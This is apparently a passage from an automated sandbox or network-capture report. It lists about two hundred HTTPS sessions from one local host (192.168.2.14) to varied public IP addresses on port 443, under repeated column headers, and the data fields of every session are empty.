                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14086192.168.2.145954670.204.143.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14087192.168.2.1450064170.63.192.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14088192.168.2.1444454100.171.168.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14089192.168.2.1436098177.187.44.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14090192.168.2.1433058172.96.223.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14091192.168.2.144028876.201.54.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14092192.168.2.143692277.119.149.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14093192.168.2.1447020160.180.57.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14094192.168.2.1442438166.53.228.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14095192.168.2.144128044.104.65.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14096192.168.2.1432768138.107.197.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14097192.168.2.1443886210.6.124.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14098192.168.2.1456264100.184.150.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14099192.168.2.144945637.3.165.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14100192.168.2.144427682.3.62.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14101192.168.2.1442296196.195.157.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14102192.168.2.1450080160.146.218.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14103192.168.2.145924467.6.254.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14104192.168.2.144456836.105.255.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14105192.168.2.1453050143.221.211.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14106192.168.2.1458662161.196.166.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14107192.168.2.1445190118.170.158.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14108192.168.2.145365866.199.55.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14109192.168.2.1452482188.21.49.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14110192.168.2.143621869.138.65.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14111192.168.2.143450827.227.6.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14112192.168.2.145448248.25.144.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14113192.168.2.1450230202.44.110.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14114192.168.2.1449472109.144.217.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14115192.168.2.1447468161.74.214.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14116192.168.2.143640461.205.126.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14117192.168.2.143541666.85.216.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14118192.168.2.144344885.41.67.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14119192.168.2.1434582136.31.156.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14120192.168.2.145705284.10.151.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14121192.168.2.1445848145.105.200.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14122192.168.2.1455028148.106.128.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14123192.168.2.145077643.195.134.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14124192.168.2.1457000155.116.60.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14125192.168.2.1455786177.130.193.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14126192.168.2.1446870186.94.223.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14127192.168.2.1435694207.179.57.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14128192.168.2.1450996104.147.119.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14129192.168.2.1447844141.96.118.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14130192.168.2.145108898.11.190.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14131192.168.2.143279682.9.82.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14132192.168.2.1442236153.8.209.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14133192.168.2.1453376203.214.162.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14134192.168.2.1451460148.171.189.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14135192.168.2.144923468.127.50.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14136192.168.2.1450352223.214.253.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14137192.168.2.145393439.244.171.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14138192.168.2.1449288117.171.114.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14139192.168.2.144183696.61.179.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14140192.168.2.1452160116.177.135.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14141192.168.2.1449326199.135.234.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14142192.168.2.1445554131.239.68.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14143192.168.2.1442410100.144.156.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14144192.168.2.145659098.66.245.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14145192.168.2.1439972218.118.44.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14146192.168.2.1452164218.12.19.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14147192.168.2.1453952118.86.10.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14148192.168.2.1446396148.177.252.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14149192.168.2.1450962202.159.37.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14150192.168.2.1448284139.197.85.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14151192.168.2.143878466.53.39.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14152192.168.2.145369894.58.0.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14153192.168.2.145312640.227.177.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14154192.168.2.1454096205.107.122.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14155192.168.2.1433862100.197.172.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14156192.168.2.1450158113.184.149.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14157192.168.2.1448000155.17.62.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14158192.168.2.145091025.123.117.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14159192.168.2.1436246178.254.208.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14160192.168.2.1447326154.149.119.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14161192.168.2.143740052.32.78.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14162192.168.2.145821419.96.224.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14163192.168.2.1442470171.60.30.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14164192.168.2.143964859.203.222.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14165192.168.2.1442042213.114.6.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14166192.168.2.143743276.150.237.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14167192.168.2.1434176173.96.13.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14168192.168.2.1445224172.246.86.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14169192.168.2.14466762.56.213.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14170192.168.2.1455340223.45.202.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14171192.168.2.1433858135.71.183.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14172192.168.2.1433058157.30.135.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14173192.168.2.1450766196.0.186.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14174192.168.2.143283427.240.37.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14175192.168.2.1437910135.65.184.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14176192.168.2.143364648.210.183.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14177192.168.2.14396821.183.236.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14178192.168.2.1460548197.43.171.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14179192.168.2.1456184197.75.223.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14180192.168.2.1437648154.241.161.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14181192.168.2.1438900101.99.161.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14182192.168.2.1443946206.160.84.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14183192.168.2.1443204162.231.241.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14184192.168.2.1445394177.135.193.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14185192.168.2.14425981.56.31.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14186192.168.2.1433116200.157.136.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14187192.168.2.1435492194.48.30.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14188192.168.2.145918893.12.39.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14189192.168.2.1437998161.227.168.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14190192.168.2.1454148206.108.228.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14191192.168.2.1442930199.129.101.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14192192.168.2.1447178175.196.234.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14193192.168.2.1458054205.98.239.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14194192.168.2.1456756125.21.243.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14195192.168.2.143733023.207.243.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14196192.168.2.1446352135.122.17.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14197192.168.2.1449488125.163.253.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14198192.168.2.144695462.184.164.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14199192.168.2.143368676.243.50.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14200192.168.2.1434148123.116.149.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14201192.168.2.143598480.52.190.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14202192.168.2.145718871.167.175.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14203192.168.2.1433180221.130.133.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14204192.168.2.1436996176.223.57.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14205192.168.2.1442986161.64.63.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14206192.168.2.146027874.101.10.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14207192.168.2.144876486.229.185.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14208192.168.2.1442856110.142.107.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14209192.168.2.1444332108.141.205.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14210192.168.2.1447140180.144.125.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14211192.168.2.1449932210.142.123.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14212192.168.2.1460374148.132.213.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14213192.168.2.1436018197.55.7.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14214192.168.2.14337964.153.1.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14215192.168.2.145223254.76.191.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14216192.168.2.144453631.97.11.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14217192.168.2.144433086.65.172.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14218192.168.2.1433548204.223.248.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14219192.168.2.146061876.135.178.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14220192.168.2.1457850167.102.251.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14221192.168.2.1444136148.184.69.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14222192.168.2.1441174178.60.158.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14223192.168.2.1436052195.29.193.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14224192.168.2.1438730124.108.107.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14225192.168.2.1448764116.25.238.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14226192.168.2.1433666199.206.134.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14227192.168.2.1451522179.123.228.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14228192.168.2.1436216140.113.223.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14229192.168.2.1453644110.219.59.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14230192.168.2.1437294159.137.167.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14231192.168.2.1454354176.99.92.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14232192.168.2.1458964121.95.216.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14233192.168.2.1441816153.228.25.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14234192.168.2.1451228131.196.211.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14235192.168.2.1456086189.8.43.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14236192.168.2.1448528136.95.64.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14237192.168.2.1443224156.238.80.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14238192.168.2.1460432128.25.90.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14239192.168.2.145446296.76.227.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14240192.168.2.1456832142.176.148.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14241192.168.2.144896852.177.73.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14242192.168.2.1435994191.90.83.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14243192.168.2.1433608199.234.245.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14244192.168.2.145509478.35.226.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14245192.168.2.145981863.74.96.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14246192.168.2.145520037.100.240.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14247192.168.2.145449075.43.241.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14248192.168.2.14527162.142.246.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14249192.168.2.1452638190.204.129.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14250192.168.2.1439420133.54.133.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14251192.168.2.1436448218.234.101.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14252192.168.2.143449493.178.77.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14253192.168.2.143500490.153.89.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14254192.168.2.1460416206.210.204.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14255192.168.2.1455834205.237.65.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14256192.168.2.144816858.251.144.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14257192.168.2.1435158179.136.225.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14258192.168.2.1434980151.57.180.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14259192.168.2.1454858203.134.218.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14260192.168.2.1457198204.67.246.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14261192.168.2.145302444.59.170.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14262192.168.2.1439852222.51.159.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14263192.168.2.1434980108.200.197.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14264192.168.2.1453474172.107.30.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14265192.168.2.145540686.125.58.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14266192.168.2.144649832.204.55.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14267192.168.2.1451340147.172.127.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14268192.168.2.1447254125.252.223.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14269192.168.2.1440524210.20.141.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14270192.168.2.1458244156.155.219.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14271192.168.2.145404645.77.43.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14272192.168.2.1439676201.46.5.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14273192.168.2.145709841.183.126.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14274192.168.2.144322479.170.200.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14275192.168.2.144370418.120.78.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14276192.168.2.1452520218.174.154.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14277192.168.2.145222296.18.59.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14278192.168.2.1449784121.172.250.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14279192.168.2.1460972117.73.140.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14280192.168.2.143428862.96.53.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14281192.168.2.1440210150.219.173.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14282192.168.2.1455800191.170.94.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14283192.168.2.144293845.89.228.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14284192.168.2.144954614.109.82.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14285192.168.2.145062039.208.35.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14286192.168.2.1440530221.110.16.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14287192.168.2.145960483.144.244.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14288192.168.2.1453262175.244.54.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14289192.168.2.1440016107.0.196.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14290192.168.2.145687834.55.24.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14291192.168.2.145492685.242.20.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14292192.168.2.1435796132.123.69.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14293192.168.2.1449572171.66.48.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14294192.168.2.1442920130.53.109.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14295192.168.2.1460290170.178.28.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14296192.168.2.1436120193.123.74.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14297192.168.2.143417066.8.157.135443
                                                      TimestampBytes transferredDirectionData


